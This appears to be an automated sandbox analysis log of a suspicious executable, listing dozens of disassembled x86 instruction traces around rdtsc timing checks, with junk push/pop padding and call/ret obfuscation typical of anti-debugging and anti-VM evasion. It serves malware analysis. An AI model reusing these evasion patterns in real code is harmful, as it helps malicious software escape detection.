                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0B92 second address: CC0BA4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0BA4 second address: CC0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0BAA second address: CC0BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2132 second address: CC21DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9222h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB97CFE921Eh 0x00000011 nop 0x00000012 jo 00007FB97CFE9216h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FB97CFE9218h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 sub dword ptr [ebp+1248FE50h], esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FB97CFE9218h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 cld 0x00000057 mov ebx, dword ptr [ebp+122D1FCCh] 0x0000005d xchg eax, esi 0x0000005e jns 00007FB97CFE922Bh 0x00000064 push eax 0x00000065 pushad 0x00000066 jmp 00007FB97CFE921Dh 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC13BA second address: CC13D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FB97CFF015Fh 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2413 second address: CC2418 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC33B9 second address: CC33BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC33BD second address: CC33C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC33C3 second address: CC33C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC33C8 second address: CC33CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5388 second address: CC53D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB97CFF015Fh 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FB97CFF0161h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 and edi, dword ptr [ebp+122D2AB6h] 0x0000001c push eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB97CFF0164h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4479 second address: CC44E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FB97CFE9227h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 xor dword ptr [ebp+122D1CCBh], eax 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 movsx ebx, si 0x00000027 and edi, 56743124h 0x0000002d mov eax, dword ptr [ebp+122D0F49h] 0x00000033 mov dword ptr [ebp+122D24FFh], edi 0x00000039 push FFFFFFFFh 0x0000003b nop 0x0000003c ja 00007FB97CFE9224h 0x00000042 push eax 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC54AA second address: CC558E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB97CFF015Fh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007FB97CFF0166h 0x00000017 or dword ptr [ebp+1245F978h], ecx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FB97CFF0158h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e and edi, dword ptr [ebp+122D210Ah] 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b movzx edi, cx 0x0000004e mov eax, dword ptr [ebp+122D01A5h] 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007FB97CFF0158h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 0000001Ch 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e xor dword ptr [ebp+122D2E22h], eax 0x00000074 push FFFFFFFFh 0x00000076 sub dword ptr [ebp+122D1EE5h], eax 0x0000007c nop 0x0000007d pushad 0x0000007e jg 00007FB97CFF0160h 0x00000084 jl 00007FB97CFF015Ch 0x0000008a jng 00007FB97CFF0156h 0x00000090 popad 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 jmp 00007FB97CFF015Ch 0x00000099 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7482 second address: CC7488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7488 second address: CC7492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB97CFF0156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC662C second address: CC6632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6632 second address: CC6637 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8413 second address: CC8426 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8426 second address: CC8431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB97CFF0156h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7696 second address: CC769B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC934A second address: CC935B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC956F second address: CC9591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB97CFE9229h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9664 second address: CC9668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9668 second address: CC966E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA5B7 second address: CCA5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF3FE second address: CCF412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007FB97CFE9218h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF412 second address: CCF451 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push esi 0x0000000d movsx edi, si 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB97CFF0158h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f movzx edi, si 0x00000032 xchg eax, esi 0x00000033 push esi 0x00000034 jbe 00007FB97CFF015Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF451 second address: CCF45D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE554 second address: CCE598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 and di, 118Dh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 movzx edi, dx 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f xor edi, dword ptr [ebp+12480C72h] 0x00000025 mov eax, dword ptr [ebp+122D14C5h] 0x0000002b sbb edi, 15AD559Dh 0x00000031 push FFFFFFFFh 0x00000033 mov dword ptr [ebp+1244FAB8h], esi 0x00000039 nop 0x0000003a pushad 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE598 second address: CCE5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB97CFE9216h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF5E9 second address: CCF5F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD07D7 second address: CD07E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D42 second address: C73D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D46 second address: C73D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D4A second address: C73D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB97CFF0156h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA18E second address: CDA197 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA197 second address: CDA1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 je 00007FB97CFF015Eh 0x0000000d jng 00007FB97CFF0156h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007FB97CFF0156h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA1B4 second address: CDA1BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD98E2 second address: CD98E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD98E7 second address: CD9907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9224h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jp 00007FB97CFE9216h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9A43 second address: CD9A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9A4A second address: CD9A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9A51 second address: CD9A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9B8B second address: CD9B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D08F second address: C6D0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB97CFF0156h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0A0 second address: C6D0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0A6 second address: C6D0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0AA second address: C6D0B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB97CFE9216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0B4 second address: C6D0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB97CFF0161h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0CD second address: C6D0E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB97CFE9216h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE06F6 second address: CE06FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE06FA second address: CE0700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0938 second address: CE093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE093C second address: CE0946 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0946 second address: CE094C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE094C second address: CE0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0950 second address: CE0988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FB97CFF0161h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 jc 00007FB97CFF0158h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8D7D second address: CE8D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8D81 second address: CE8D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE807A second address: CE809A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB97CFE9216h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB97CFE9224h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE833A second address: CE834C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF015Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE834C second address: CE835D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE835D second address: CE8399 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB97CFF015Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c jl 00007FB97CFF0156h 0x00000012 jmp 00007FB97CFF015Dh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f jmp 00007FB97CFF015Fh 0x00000024 pop edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE84F8 second address: CE8508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFE921Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE864F second address: CE8655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE87F6 second address: CE8801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8BF1 second address: CE8C0D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB97CFF0156h 0x00000008 jmp 00007FB97CFF0162h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8C0D second address: CE8C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8C15 second address: CE8C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEBA67 second address: CEBA73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB97CFE9216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFC90 second address: CEFC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFC94 second address: CEFCBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB97CFE9225h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jp 00007FB97CFE9218h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFCBC second address: CEFCC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFCC2 second address: CEFCC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5848 second address: CF5881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jbe 00007FB97CFF0156h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edi 0x0000000e jp 00007FB97CFF0162h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FB97CFF0156h 0x0000001c jmp 00007FB97CFF0161h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4250 second address: CF425F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FB97CFE9216h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF476C second address: CF4786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF015Ch 0x00000009 popad 0x0000000a pushad 0x0000000b ja 00007FB97CFF0156h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4786 second address: CF478C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF478C second address: CF4793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4793 second address: CF479D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB97CFE9216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF479D second address: CF47A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4A92 second address: CF4A9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4A9A second address: CF4A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4A9F second address: CF4ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9224h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4ABB second address: CF4ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB97CFF0156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4ACF second address: CF4AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4AD3 second address: CF4AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB97CFF0156h 0x0000000e rdtsc
